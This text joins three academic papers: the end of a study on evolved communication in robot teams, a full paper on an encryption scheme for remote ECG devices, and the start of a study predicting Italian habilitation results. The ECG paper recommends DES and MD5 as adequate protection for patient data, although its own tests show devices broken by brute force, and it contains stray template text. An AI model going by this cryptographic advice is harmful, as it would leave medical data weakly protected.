which lead to smaller and larger semi-circles in the case of reactive and non-reactive robots, respectively. These larger semi-circular trajectories allow non- reactive robots to find the target areas much more quickly with respect to non-reactive robots. 18 Indeed, the percentage of lifecycle in which all the four robots are located in the target areas is about 17% and 44%, on average, in the case of reactive and non-reactive robots (see Figure 15). The fact that non-reactive robots are better in finding the target areas, however, does not translate into better performance (in the “Deprived” condition) since non-reactive robots are more likely to spend their lifetime both in positive conditions (in which each target area contains one or two robots) and negative conditions (in which a target area contains three or four robots). As a consequence, although non-reactive robots display a better exploration strategy than reactive robots, overall performance of reactive and non-reactive robots is similar in “Deprived” conditions. Figure 14. Typical behaviour displayed by the team of evolved robots in a “deprived” condition in which they are not allowed to detect other robots’ signals for reactive (left) and non-reactive robots (right). The numbers indicate the starting and ending position of the corresponding robot (the ending position is also marked with a white circle). 0 0.05 0.1 0.15 0.2 0.25 0.3 void 1 2 1 + 2 2+2 1+3 3 4 19 Figure 15. Percentage of lifecycles spent by a team of four robots in the 8 possible different states tested in a “Deprived” condition in which robots are not allowed to detect other robots’ signals. “Void” indicates the case in which all the four robots are located outside target areas (fitness = 0.0). “1” indicates the case in which only a single robot is located in a target area (fitness = 0.25). “2” indicates the case in which two robots are located in target areas. “1+2” indicates the case in which one robot is located in a target area an other two robots are located in the other target area (fitness = 0.75). “2+2” indicates the case in which each of the two target area contains two robots (fitness = 1.0). “1 + 3” the case in which one target area contains one robot and the other three robots (fitness = 0.0). “3” indicates the case in which three robots are located in the same target area (fitness = -0.25). “4” indicates the case in which four robots are located in the same target area (fitness = -1.0). Grey and black bars represent the performance of reactive and non-reactive robots, respectively. Average performance obtained by testing the robots for 1000 trials lasting 1000 cycles. When we look at the relation between individual and social behaviour, however, we can see that the characteristics of the individual behaviour exhibited by reactive and non-reactive robots perfectly match with the characteristics of their social/communicative behaviour. In other words, individual and social behaviour are tightly co-adapted. The fact that reactive robots display a ‘sub-optimal’ exploration behaviour (i.e. a behaviour that does not maximize the probability to quickly find and enter into target areas) can be explained by considering their limited ability to avoid target areas that already contain two robots and to exit from target areas that contain more than two robots (see Figure 6 and 7). A reliable ability to avoid situations in which more than two robots are located into the same target area thus constitute a pre-requisite for the emergence of a better exploration ability. The lack of this pre-requisite in reactive individuals explains why their exploration ability is not further optimised. On the other hand, the better capability of non-reactive robots to avoid situations in which more than two robots are located in the same target area (see Figure 6 and 7), explains why evolved non-reactive robots developed a more effective exploration behaviour. Indeed, if we look at the time spent by robots in target areas that contain more than two robots, we can see that in a “Deprived” condition, non-reactive robots are much worse than reactive robots (Figure 15). In normal conditions, instead, non-reactive robots are much better than reactive robots (Figure 16). 20 0 0.05 0.1 0.15 0.2 0.25 0.3 0.35 0.4 void 1 2 1 + 2 2+2 1+3 3 4 Figure 16. Percentage of lifecycles spent by a team of four robots in the 8 possible different states (see the legend of Figure 15) tested in a normal condition. Grey and black bars represent the performance of reactive and non-reactive robots, respectively. Average performance obtained by testing the robots for 1000 trials lasting 1000 cycles. 7. Discussion In this paper we have described the results of an experiment in which an effective communication system arises among a collection of initially non-communicating agents evolved for the ability to solve a collective navigation problem. By analysing the obtained results we observed how evolving individuals developed: (a) an effective communication system, (b) an effective individual behaviour, (c) an ability to rely on different communication modalities and to autonomously select the modality that is appropriate to the current circumstances. The communication system that emerges in the experiments is based on 4-5 different signals that characterize crucial features of the environment, of the agents/agents relations, and agents/environmental relations (e.g. the relative location of a target area, the number of agents contained in a target area, etc.). These features, that have been discovered autonomously by the agents themselves, are grounded in agents’ sensory-motor experiences. Used signals, therefore, do not only refer to the characteristics of the physical environment but also to those of the social environment constituted by the other agents and by their current state. Evolved individuals also display an ability to appropriately tune their individual and communicative behaviour on the basis of the signals detected (e.g. by approaching, avoiding, or exiting a target area, by modifying their exploratory behaviour, etc.) . Indeed, the type of signals produced, the context in which they are produced, and the effect of signals detected constitute three interdependent aspects of the communication system that co-adapt during the evolutionary process and co-determine the ‘meaning’ and the efficacy of each signal and of the communication system as a whole. 21 The individual behaviour of evolved robots includes simple elementary behaviours that allow robots to avoid obstacles, explore the environment, and remain in target areas. Interestingly, robots individual behaviour tend to be optimised (with respect to the possibility to obtain the best possible performance when signals produced by other robots are not available) despite the fact that robots are always evaluated in social conditions during the evolutionary process. This unexpected result might be explained by considering that required signals might not always be available (even in normal conditions in which robots are allowed to communicate) since their availability depends on the physical location of the robots in the environment that in turn depends on unpredictable events such us robots initial positions and orientations or noise). In other words, optimised individual behaviours guarantee good performance even when required signals are not available. This tendency to optimise both individual and social behaviour leads to the development of control systems structured hierarchically according to a layered organization in which the individual abilities represent the most basic layer and communication/social ability represents an higher level layer that modulates the lower level. The fact that communication abilities represent a high level structure that modulates the basic individual behaviours of the robots does not prevent evolving robots to co-adapt their individual and communicative behaviour. Indeed, by comparing the results of different replication of the experiments, we observed that individual behaviours tend to be selected in order to maximize individual performance (when signals from other robots are not available) but also in order to maximize the performance that can be achieved by combining the robots individual and social capabilities. Evolved robots also exploit different communication modalities (e.g. mono-directional communication forms in which one robot act as a ‘speaker’ and a second robot act as a ‘hearer’ or bi-directional communication forms in which two robots concurrently influence each other through their signalling and/or motor behaviour) by selecting the modality that is appropriate to each specific communicative interaction. Evolving individuals also engage in complex communication behaviours that involve three different robots that concurrently affect each other so to produce appropriate collective behaviours (e.g. so to push one of the three robots located inside the same target area out of the area). Evolved robots also exploit time varying signals that allow them to generate information that is not available to any single robot (e.g. information related to how many robots are located in a target area) and that serve different functions. The analysis of the evolutionary dynamics suggests that new individual capabilities might represent a crucial pre-requisite toward the development of new communication capabilities and vice versa. For example, the individual ability to explore the environment by entering and remaining into target areas represents a crucial pre-requisite for the development an ability to produce signal B, that attract other robots toward the target area. On the other hand, the emergence of a social/communicative ability to avoid target areas that contain two robots and to exit from areas that contain more than two robots, represents crucial pre-requisites for the development of better individual exploration strategies. In fact, as we showed in section 6, very effective exploration strategies provide an adaptive advantage only in combination with effective communication systems that allow to robots to avoid situations in which more than two robots are located in the same target area. This process in which progress in individual abilities might pose the basis for the achievement of progresses in communication abilities and vice versa might lead to an open ended evolutionary phases in which individuals tend to develop progressively more complex and effective strategies. 22 Acknowledgments The research has been supported by the ECAGENTS project funded by the Future and Emerging Technologies programme (IST-FET) of the European Community under EU R&D contract IST-1940. References Baldassarre G., Nolfi S. & Parisi D. (2003). Evolving mobile robots able to display collective behaviour. Artificial Life, 9: 255-267. Cangelosi A. & Parisi D. (1998) The emergence of a ‘language’ in an evolving population of neural networks. Connection Science, 10: 83-97 Di Paolo E.A. (2000). Behavioural coordination, structural congruence and entrainment in a simulation of acoustically coupled agents. Adaptive Behaviour 8:1. 25-46. Kirby S. (2002). Natural Language from Artificial Life. Artificial Life, 8(2):185--215. Iizuka H. and Ikegami T. (2003a). Adaptive Coupling and Intersubjectivity in Simulated Turn-Taking Behaviours. In Banzahf et al. (Eds.), Proceedings of ECAL 03, Dortmund: Springer Verlag. Iizuka H. and Ikegami T. (2003b). Simulating Turn-taking Behaviors with Coupled Dynamical Recognizers. In R.K. Standish, M.A. Bedau and H.A. Abbass (Eds.), MIT, Proceedings of Artificial Life VIII, Cambridge, MA: MIT Press. Iizuka H. & Ikegami T. (2004). Simulating autonomous coupling in discrimination of light frequencies. Connection Science. 16(4): 283-299. Marocco D., Cangelosi A. & Nolfi S. (2003), The emergence of communication in evolutionary robots. Philosophical Transactions of the Royal Society London - A, 361: 2397-2421. Nolfi S. (2002). Evolving robots able to self-localize in the environment: The importance of viewing cognition as the result of processes occurring at different time scales. Connection Science (14) 3:231-244. Nolfi S. (2005). Emergence of Communication in Embodied Agents: Co-Adapting Communicative and Non-Communicative Behaviours. Connection Science. (17) 3-4:231- 248. Nolfi S. & Marocco D. (2001). Evolving robots able to integrate sensory-motor information over time, Theory in Biosciences, 120:287-310. Quinn M. (2000). Evolving cooperative homogeneous multi-robot teams. In Proceedings of the IEEE / RSJ International Conference on Intelligent Robots and Systems (IROS 2000). IEEE Press. Quinn M. (2001). Evolving communication without dedicated communication channels. In Kelemen, J. and Sosik, P. (Eds.) Advances in Artificial Life: Sixth European Conference on Artificial Life (ECAL 2001). Springer Verlag. Quinn M., Smith L., Mayley G. & Husbands P. (2003). Evolving controllers for a homogeneous system of physical robots: Structured cooperation with minimal sensors. Philosophical Transactions of the Royal Society of London, Series A: Mathematical, Physical and Engineering Sciences 361, pp. 2321-2344. Steels L. (1999). The Talking Heads Experiment, Antwerpen, Laboratorium. Limited Pre- edition. Steels L. (2003) Evolving grounded communication for robots. Trends in Cognitive Science. 7(7): 308-312. Steels L. and Kaplan F. (2001). AIBO's first words: The social learning of language and meaning. Evolution of Communication, 4:3-32. 23 Steels L. & Vogt P. (1997) Grounding adaptive language games in robotic agents. In: P. Husband & I. Harvey (Eds.), Proceedings of the 4th European Conference on Artificial Life. Cambridge MA: MIT Press. Werner, G.M. & Dyer M.G. (1991). Evolution of communication in artificial organisms. In Langton, C. G., Taylor, C., Farmer, J. D., and Rasmussen, S. (Eds.) Proceedings of the Workshop on Artificial Life. pages: 659-687. Reading, MA, Addison-Wesley. Wagner K., Reggia J.A., Uriagereka J., Wilkinson G.S. (2003). Progress in the simulation of emergent communication and language. Adaptive Behavior, 11(1):37-69. 24 Introduction Related literature Experimental set-up and emergence of communication The evolved communication system: signals produced and their Experiment I – Reactive robots Experiment II – Non-Reactive robots The evolved communication system: communication modalities Relation between individual and social/communicative behavio Discussion work_ok6ue4ib3fatlnuar26cvagtom ---- Paper Title (use style: paper title) International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 31 Remote ECG System Data Encryption Scheme Liu Xin College of Information Science and Engineering Ocean University of China Qingdao, China e-mail: liuxinouc@126.com Wei Zhiqiang College of Information Science and Engineering Ocean University of China Qingdao, China Abstract—The remote ECG communicates over the public Internet, and the public Internet security is not sufficient to ensure the information security of the remote ECG system. User data disclosure poses a security threat to the system. The ECG information security solution proposed in this paper adopts the method of preset multi-key-per-machine at the factory to avoid leakage caused by personnel factors, and uses the hash function to generate a secondary password for communication encryption during network transmission. Experiments show that this program can effectively resist the existing various attack methods and fully protect patient data security. Keywords-Remote ECG System; Multi-Key-Per-Machine I. INTRODUCTION In the remote ECG system, because the terminals are distributed in the vast number of families, clinics, community hospitals, etc., there are problems in the management of physical equipment. Since the ECG data is communicated through the Internet, there is a problem that the communication data packet can be intercepted and monitored. Due to the diversification of commercial channels and construction teams, there is also a risk of technical confidentiality leaks. This paper proposes a remote ECG system data encryption mechanism, which generates unable-to-remember keys by means of a random number generator, establishes a multi-key model, and implements the encryption storage and secure communication technology for periodic replacement of keys. The core design concept of this program is: human beings as a confidential subject is also a key factor in generating leaks. If every link of encryption is implemented by an automatic algorithm and the artificial factors are completely eliminated, the patient data security can still be effectively protected in the presence of the above security management vulnerability. II. DESIGN OF INFORMATION SECURITY SCHEME FOR REMOTE ECG SYSTEM The key protocol developed in this paper contains mechanisms for key generation, storage, deployment, and verification. This scheme takes into account various attacks such as brute force cracking by attackers and interception of network communication packets. A. Hardware risk control scheme The hardware of the device may be disassembled, and the data on the storage device can be taken out. If the attacker can obtain two devices of the same model, the content of the key can be known through the content comparison. A common method of hardware attacks is the wiretap method. For example, a logic analyzer records and analyzes the timing of signals on the memory bus of the memory device. Practice has proved that ordinary memory devices, such as Nor Flash chip, Nand Flash chip or I2C bus serial memory cannot resist the wiretap method attack. Therefore, we must use the Tamper-Resistant Security Module (TRSM) to store the encryption key. In theory, pure software encryption cannot guarantee the security of the key when there is a possibility that the hardware is disassembled. This solution uses a TRSM with a capacity of 1k bytes, which costs about $0.50, and the cost increase for the entire device is negligible. B. Research on Key Agreement of multi-key-per-machine The template is used to format your paper and style the text. All margins, column widths, line spaces, and text fonts are prescribed; please do not alter them. You may note peculiarities. For example, the head margin in this template measures proportionately more than is customary. This measurement and others are deliberate, using specifications that anticipate your paper as one part of the entire proceedings, and not as an independent document. Please do not revise any of the current designations. A multi-key-per-machine encryption algorithm is used to encrypt patient data in the terminal device memory. Patient data can be sent to the cloud very quickly, but we need to consider the device features in the off-network state. So local storage is still an indispensable feature. Considering that the terminal equipment needs to deal with many tasks such as write memory, waveform curve drawing, network communication, alarm and other emergency processing, the encryption algorithm should not adopt an overly complex algorithm. The key point of prevention is to be able to prevent attackers from implementing bulk cracking on same model devices. Therefore, the key issue of encryption is the key design and the key storage. DOI: 10.21307/ijanmc-2019-018 International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 32 C. Key design User data (patient ECG data) is encrypted using a block cipher encryption scheme. A block cipher is also called a symmetry cipher. When encrypting plaintext by using a block cipher, firstly, the plaintext needs to be grouped, each group has the same length, and then each set of plaintexts is separately encrypted to obtain a ciphertext of the same length. A block cipher is characterized by the same encryption key as the decryption key. This scheme adopts the DES encryption standard, the packet length is 64 bits, and the key length is also 64 bits. There are 8 parity bits in the key, and the actual key length is 56 bits. Although DES has been replaced by AES, the encryption strength is sufficient for this application and the computational complexity is lower than AES. The modular multiplication that AES needs to use is too computationally intensive for embedded processors and is not suitable for encrypting real-time collected ECG data streams. D. Key security strength Considering the possibility that the device-side key is forcibly cracked by an attacker, a mechanism for periodically changing the key can be adopted. In general, the life of an electrocardiograph is 10 years. If you change the key once a month, you need 120 keys for a total of 960 bytes. The cloud server's cost of storing 1 million groups of lifetime keys is 960M, which is still affordable. E. Key generation The composition of the key on each terminal device: 120 random numbers are stored as a key sequence, and the total length is 960 bytes. The server can generate a sequence of random numbers with a length of 960M at a time, and then sequentially intercept 960 bytes for each device. The key of the device and the offset of the key sequence in the server- side master key are recorded in the device's secure memory. The server records the product serial number of each device and the corresponding random number sequence index value. As long as the random number is guaranteed not to be copied by internal spies during the manufacturing process, the security of the key can be ensured. F. Key deployment The device should have a 1K capacity of secure memory(TRSM). The 120 user data encryption keys (960 bytes long random number) of the full life are loaded into the machine's secure memory at one time when the machine is shipped from the factory. If the device is out of service, you can use these keys in a rolling loop. The device does not update the key after it leaves the factory, preventing the key from being intercepted by the attacker during delivery. After the device leaves the factory, it is no longer necessary to transfer the user data encryption key under any condition, which eliminates the possibility of the key data packet being intercepted. G. Key verification The main purpose of key verification is to test whether the encryption-related hardware and software systems are defective. After the machine is assembled, read out the 120 key values in the secure memory, and the MD5 value of the keys is calculated and sent to the cloud server along with the product serial number. If the server-side verification is successful, the key can be considered to have been deployed correctly. If you are worried about the collision of MD5 values, you can pre-calculate all device keys on the server side in advance, and delete the key segments with MD5 duplicates. The probability of such a problem in theory is extremely small. H. Key synchronization Through the above steps, we deployed the same user data encryption key sequence on the terminal device and the cloud server, but how to use the two is still a problem. Ideally, using timestamp as a synchronization parameter is the best solution. The two parties can agree that, from the date of leaving the factory, the natural month is used as the measurement granularity, and a new key is replaced every natural month. The problem is that in the actual use environment, the time accuracy of the device side is completely unsecured. On the one hand, the RTC (Real Time Clock) devices based on quartz crystal oscillators do not achieve such precision, and some devices run faster than others. On the other hand, the RTC backup power failure is difficult to avoid, and the device cannot be abandoned because the clock is inaccurate. Furthermore, if the user is allowed to adjust the device time, the attacker can take advantage of this adjustment opportunity to detect the subsequent ciphertext form in advance, which will be a significant security hole. In the case of networking, the server can know the number of key-used-times on the terminal device. When the server finds that the consumption speed of the terminal key is too slow, it is expected that the pre-stored 120 keys will not be used in the entire product life cycle, and the maximum- key-used-times value can be modified by the key agreement protocol (change the maximum-key-used-times to be small). First, a temporary communication key for modifying the maximum-key-used-times value is negotiated using the Diffie-Hellman key exchange protocol. The generator element p of the large prime number Q and the rational number domain FQ is required to be pre-agreed between the server and the device. Q and p are written into the device's TRSM at the factory. The algorithm for generating the temporary communication key K is as follows:  1, The server generates a random number x, calculates A = px mod Q, and sends it to the terminal;  2, The terminal generates a random number y, calculates B = py mod Q, and sends it to the server;  3, The terminal calculates K = Ay mod Q, and the server calculates K = Bx mod Q, which proves that the two K values are equal. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 33 In this way, the server and the terminal share the random number K as a temporary communication key for modifying the maximum-key-used-times, and the attacker cannot detect the communication content. Even if the content can be cracked by the attacker, it is only an index value, and the key cannot be derived. The server should record the timestamp of modify the maximum-key-used-times value to avoid modifying it too frequently. Modify it 1 to 3 times a month is enough. In the case where the hardware can ensure the security of the key, it is not necessarily meaningful to change the key too frequently. III. DATA COMPRESSION UPLOAD SCHEME DESIGN Channel eavesdropping is a common attack method. In the Internet environment, it is easy to intercept communication packets on the network line by means of route bypass. The scheme adopts data compression and then encrypts and transmits, as shown in Fig. 1, which further increases the attacking difficulty of the attacker while reducing the load of the network. After the cracker obtains the message, the compressed file can be restored by the exhaustive cracking method; since the key used for the two encryptions is different, the original data obtained from the compressed file needs to be cracked again. A legitimate cloud server stores the original key from the factory. It is easy to calculate the compression key from the original key. Conversely, since the hash function is irreversible, it is not feasible to derive the original key from the compression key, and the attacker can only crack it by the exhaustive method. Figure 1. Two encryption processes Both ciphers in Fig. 1 use the DES algorithm. The hash function uses the MD5 algorithm. MD5 requires a 64-byte input to generate a 16-byte output. In order to meet the input requirements of MD5, the consecutive 8 keys in the key queue are taken as a set of parameters. After the key expires and the next key is replaced, the parameter group is pushed back and used in turn. Data compression can use Shannon coding or Huffman coding. But today there are many mature methods that can be used, and there is no need to reinvent the wheel for a little performance boost. We use two classical algorithms to compress a 100M size data file. The performance is shown in Table 1. It can be seen that the data is de-duplicated and then compressed, and the compression ratio is the highest, which is beneficial to network transmission. The amount of data generated by the ECG machine per minute is about 0.7M, and the compression algorithm takes less than 2 seconds, which is equivalent to 1/30 processor occupancy, and the system can fully withstand this burden. TABLE I. CLASSIC COMPRESSION ALGORITHM PERFORMANCE TEST Algorithm Compression Ratio Time Consuming (Seconds) gzip (Compression) 36.2% 452 dedup (Remove Duplicates) 51.5% 78 First gzip and then dedub 26.8% 468 First dedub and then gzip 14.6% 203 IV. EXPERIMENT AND VERIFICATION In order to verify the effectiveness of the security system, the following practical application scenarios are designed to carry out crack attacks on the remote ECG system. Attack target: obtain the patient raw data. Experimental conditions: Provide 10 attack devices and an ECG signal generator to the attack team, and informed the key length and encryption algorithm, the attacker tried on an Intel E5-2660 (ten core) server, perform no more than 100 hours of calculations on each machine to obtain its patient raw data. Experimental results: After several times of improving the attack plan, the attacker violently cracked the data records stored in the device by exhaustive cryptography, and successfully cracked two terminal devices within the specified calculation time, and the cracking time was 75 hours and 40 hours respectively. In the case that the device is not disassembled, the communication message received by the network cannot be successfully cracked. Experiments prove that this system is not completely unbreakable in the case of hardware damage, but the cost of cracking is very expensive, and it is not worth the loss. V. CONCLUSION The ECG information security solution proposed in this paper adopts the method of preset multi-key-per-machine at the factory to avoid leakage caused by personnel factors, and uses the hash function to generate a secondary password for communication encryption during network transmission. Experiments show that this program can effectively resist the existing various attack methods and fully protect patient data security. ACKNOWLEDGMENT This work is supported by The Aoshan Innovation Project in Science and Technology of Qingdao National Laboratory for Marine Science and Technology (No.2016ASKJ07) International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 34 REFERENCES [1] Chen, Zhuang, F. Qi, and C. Ye. "Research on Cloud Data Encryption Scheme Based on Chinese Cryptographic Algorithms." Journal of Information Security Research (2018). [2] Huang, Pei, et al. "A Robust and Reusable ECG-Based Authentication and Data Encryption Scheme for eHealth Systems." Global Communications Conference IEEE, 2017:1-6. [3] Quang, Do Vinh, T. N. K. Hoan, and I. Koo. "Energy-Efficient Data Encryption Scheme for Cognitive Radio Networks." IEEE Sensors Journal PP.99(2018):1-1. [4] Liang, Kaitai, et al. "An Efficient Cloud-Based Revocable Identity- Based Proxy Re-encryption Scheme for Public Clouds Data Sharing." European Symposium on Research in Computer Security Springer, Cham, 2014:257-272. [5] Xu, Lei, X. Wu, and X. Zhang. "CL-PRE:a certificateless proxy re- encryption scheme for secure data sharing with public cloud." ACM Symposium on Information, Computer and Communications Security ACM, 2012:87-88. [6] Gillies, Alan. "Improving the quality of information security management systems with ISO27000." Tqm Journal 23.4(2011):367- 376. [7] Publishing, It Governance. Iso27000 and Information Security: A Combined Glossary. It Governance Ltd, 2010. [8] Wang, Chi Hsiang, and D. R. Tsai. "Integrated installing ISO 9000 and ISO 27000 management systems on an organization." 2009 International Carnahan Conference on Security Technology IEEE, 2009:265-267. work_okvvxviedrfdxmxumhunbaqdf4 ---- Submitted 27 February 2019 Accepted 18 May 2019 Published 21 June 2019 Corresponding author Francesco Poggi, fpoggi@cs.unibo.it, francesco.poggi5@unibo.it Academic editor Diego Amancio Additional Information and Declarations can be found on page 24 DOI 10.7717/peerj-cs.199 Copyright 2019 Poggi et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Predicting the results of evaluation procedures of academics Francesco Poggi1, Paolo Ciancarini1,2, Aldo Gangemi3, Andrea Giovanni Nuzzolese4, Silvio Peroni3 and Valentina Presutti4 1 Department of Computer Science and Engineering (DISI), University of Bologna, Bologna, Italy 2 Institute of Data Science and Artificial Intelligence, Innopolis University, Innopolis, Russia 3 Department of Classical Philology and Italian Studies, University of Bologna, Bologna, Italy 4 STLab, Institute of Cognitive Science and Technologies, National Research Council, Roma, Italy ABSTRACT Background. The 2010 reform of the Italian university system introduced the National Scientific Habilitation (ASN) as a requirement for applying to permanent professor positions. Since the CVs of the 59,149 candidates and the results of their assessments have been made publicly available, the ASN constitutes an opportunity to perform analyses about a nation-wide evaluation process. Objective. The main goals of this paper are: (i) predicting the ASN results using the information contained in the candidates’ CVs; (ii) identifying a small set of quantitative indicators that can be used to perform accurate predictions. Approach. Semantic technologies are used to extract, systematize and enrich the information contained in the applicants’ CVs, and machine learning methods are used to predict the ASN results and to identify a subset of relevant predictors. Results. For predicting the success in the role of associate professor, our best models using all and the top 15 predictors make accurate predictions (F-measure values higher than 0.6) in 88% and 88.6% of the cases, respectively. Similar results have been achieved for the role of full professor. Evaluation. The proposed approach outperforms the other models developed to predict the results of researchers’ evaluation procedures. Conclusions. Such results allow the development of an automated system for support- ing both candidates and committees in the future ASN sessions and other scholars’ evaluation procedures. Subjects Data Science, Digital Libraries Keywords Predictive Models, Scientometrics, Research Evaluation, Data Processing, ASN, Machine Learning, National Scientific Habilitation, Academic assessment, Science of Science, Informetrics INTRODUCTION Quantitative indicators have been extensively used for evaluating scientific performances of a given research body. International institutions, national authorities, research and funding bodies have an increasing interest on indicators, mainly based on bibliometric data, which can be used to algorithmically assess the performance of their institutions. SCImago (https://www.scimagojr.com/) (for journals), the Performance Ranking of Scientific Papers for World Universities (http://nturanking.lis.ntu.edu.tw/) and the Academic Ranking of How to cite this article Poggi F, Ciancarini P, Gangemi A, Nuzzolese AG, Peroni S, Presutti V. 2019. Predicting the results of evaluation procedures of academics. PeerJ Comput. Sci. 5:e199 http://doi.org/10.7717/peerj-cs.199 https://peerj.com mailto:fpoggi@cs.unibo.it mailto:francesco.poggi5@unibo.it https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.199 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://www.scimagojr.com/ http://nturanking.lis.ntu.edu.tw/ http://doi.org/10.7717/peerj-cs.199 World Universities (http://www.shanghairanking.com/) (for universities) are popular examples of rankings that use bibliometric indicators to rate scientific performances. Peer review is still the Holy Grail for research evaluation, but the pressure for more frequent and extensive assessments of the performance of researchers, research groups and institutions makes bibliometry attractive. Currently, several countries use a combination of peer review and bibliometric indicators to allocate funding and evaluate the performance of higher education institutions. Examples of this mixed strategy are the Excellence in Research for Australia (ERA) and the Valutazione della Qualità della Ricerca (VQR) in Italy. The British Research Excellence Framework (REF), successor of the Research Assessment Exercise (RAE), is another example, in which experts can make use of citation data as an additional input of their reviews. In many countries, bibliometric indicators are one of the factors that can be used for assessing individuals or institutions to allocate funding at a national level. For instance, in Germany the impact factor of the publications is used in performance-based funding systems, in Finland, the reallocation system uses the number of publications as one of the considered measures, in Norway, a two-level bibliometric indicator is used for similar purposes, etc. (Vieira, Cabral & Gomes, 2014a). The growing importance of quantitative indicators may be mainly explained by their advantages compared to peer review processes: objectivity, low time and implementation costs, possibility of quick and cheap updates, ability to cover a large number of individuals, etc. However, in many cases peer review is still the only method available in practice, and is hence intensively used in many situations. We know that bibliometric indicators are more accepted in the assessment of large research bodies, but they are still used frequently for individuals. It is, therefore, very important to benchmark bibliometric indicators against traditional peer assessments in real situations. Some studies have been carried out in recent years with the main goal of finding a relation between the two methods at several levels. At national level, the relation between bibliometric indicators and the results of the Research Assessment Exercise (RAE) in Britain (Norris & Oppenheim, 2003; Taylor, 2011) or the Italian Triennial Assessment Exercise (VTR) (Abramo, D’Angelo & Caprasecca, 2009; Franceschet & Costantini, 2011) have been investigated. Other studies focused on the assessments of departments (Aksnes, 2003) and research groups (Van Raan, 2006). Just a few works have been made at the individual level (Nederhof & Van Raan, 1987; Bornmann & Daniel, 2006; Bornmann, Wallon & Ledin, 2008), while many analyzed the correlation between indicators and research performances (Leydesdorff, 2009; Franceschet, 2009). Recent works analyzed the correlation between traditional bibliometric indicators and altmetrics by also taking into account quality assessment procedures performed by peers (Nuzzolese et al., 2019; Wouters et al., 2015; Bornmann & Haunschild, 2018). All these works share the general finding that a positive and significant correlation exists between peer review and bibliometric indicators, and suggest that indicators can be useful tools to support peer reviews. In this work, we investigate the relation between quantitative indicators and peer review processes from a different perspective. The focus of the study is to analyze if and to what extent quantitative indicators can be used to predict the results of peer reviews. This problem is interesting for many different reasons. First of all, since a high number of Poggi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.199 2/28 https://peerj.com http://www.shanghairanking.com/ http://dx.doi.org/10.7717/peerj-cs.199 1The acronym ASN stands for Abilitazione Scientifica Nazionale. For the rest of the paper, all acronyms (e.g., ASN, MIUR, ANVUR, etc.) are based on the original Italian names, since they are well established in the Italian scientific community. The English translations are also provided for the benefit of the international readers. factors are involved in peer review processes (e.g., cultural, social, contextual, scientific, etc.), the feasibility of reproducing such a complex human process through computational and automatic methods is a relevant topic per se. Moreover, the possibility of predicting human assessments has many practical applications. Having an idea of the results of an evaluation procedure may be very useful for candidates (e.g., to understand if they are competitive for a given position, to decide to apply or not, etc.). Also, evaluators can benefit from such information (e.g., for supporting a first screening of the candidates, for spotting possible errors to investigate, etc.). In other words, the final goal of our work is not substituting peer committees with automatic agents, but providing tools for supporting both candidates and evaluators in their tasks. This study analyzes the Italian National Scientific Habilitation (ASN1), a nation-wide research assessment procedure involving a large number of applicants from all academic areas. The ASN is one of the main novelties in the national university system introduced by Law 240/2010 (Law, 2011), and it is similar to other habilitation procedures already in place in other countries (e.g., France and Germany) in that it is a prerequisite for becoming a university professor. The ASN is meant to attest that an individual has reached the scientific maturity required for applying for a specific role (associate or full professor) in a given scientific discipline; however, the qualification does not guarantee that a professorship position will eventually be granted. The assessments of the candidates of each discipline are performed by committees composed of four full professors from Italian universities and one professor from a foreign research institution. The evaluation is performed considering the CVs submitted by the applicants and three quantitative indicators computed for each candidate. The first session of the ASN started on November 2012 and received 59,149 applications spanning 184 Recruitment Fields (RFs), which correspond to scientific fields of study in which Scientific Areas (SAs) are organized. The curricula of all applicants, the values of their bibliometric indicators and the final reports of examination committees have been made publicly available. This work focuses on the analysis of applicants’ curricula. For this purpose, we processed this vast text corpus, extracted the contained information and used it to populate a Knowledge Graph by exploiting semantic technologies. This Knowledge Graph contains a collection of relevant data for each applicant and it has then been used to perform different kinds of analyses at the level of category of discipline (i.e., bibliometric and non-bibliometric), SA, and RF. An approach based on machine learning techniques has been used to answer the following research questions: • RQ1: Is it possible to predict the results of the ASN using only the information contained in the candidates’ CVs? • RQ2: Is it possible to identify a small set of predictors that can be used to predict the ASN results? The rest of the work is organized as follows. ‘Related Work’ presents an overview of the related work. ‘Methods and Material’ provides necessary background information about the ASN, gives an overview of the ASN dataset, and describes the algorithms used in this Poggi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.199 3/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.199 Table 1 Comparison of the related work with our study. Missing data are labeled with ‘‘n.a.’’. PoC stands for ‘‘Prediction of Citations’’, AoH for ‘‘Analysis of H-index for peer judgements’’, and PoPJ for ‘‘Prediction of Peer Judgements’’. Work Papers Authors Discipline Predictors Task Method Ibáñez et al. (JASIST, 2016) n.a. 280 Computer Science 12 PoC Gaussian Bayesian net- works Danell (JASIST, 2011) 6,030 8,149 Neuroscience and Physics 2 PoC Quantile regression Fu & Aliferis (Scientometrics, 2010) 3,788 n.a. Medicine 12 (+ textual features) PoC Support vector ma- chines Lindahl (J. of Informetrics, 2018) n.a. 406 Mathematics 4 PoC Logistic regression Bornmann & Daniel (J. of Informetrics, 2007) n.a. 414 Biomedicine 1 AoH Correlation analysis Van Raan (Scientometrics, 2006) n.a. 700 Chemistry 1 AoH Correlation and error analysis Cronin & Meho (JASIST, 2006) n.a. 31 Information Science 1 AoH Correlation analysis Vieira, Cabral & Gomes (JASIST, 2014a) 7,654 174 Hard sciences 3 (based on 12 bibl. indices) PoPJ Rank ordered logistic regression Jensen, Rouquier & Croissant (Scientometrics, 2009) n.a. 3,659 All 8 PoPJ Binomial regression Tregellas et al. (PeerJ, 2018) n.a. 363 Biomedicine 10 (3 for the best model) PoPJ Logistic regression, Support vector ma- chines This work 1,910,873 59,149 All 326 PoPJ Support vector ma- chines (CFS for feature selection) work. In ‘Results’ we describe the results of the analyses performed to answer the two aforementioned research questions, and we evaluate our work by comparing the predictive power of our approach with others at the state of the art. Finally, in the last two sections we discuss the results and draw some conclusions. RELATED WORK Quantitative indicators have been extensively used for evaluating the scientific performance of a given research body. Many recent studies have focused on the predictive power of such indicators for different purposes. These works can be divided into two main groups: those that use bibliometric indicators to predict other indicators and those that use bibliometric indicators to predict the results of evaluation procedures performed through a peer review process or a mixed 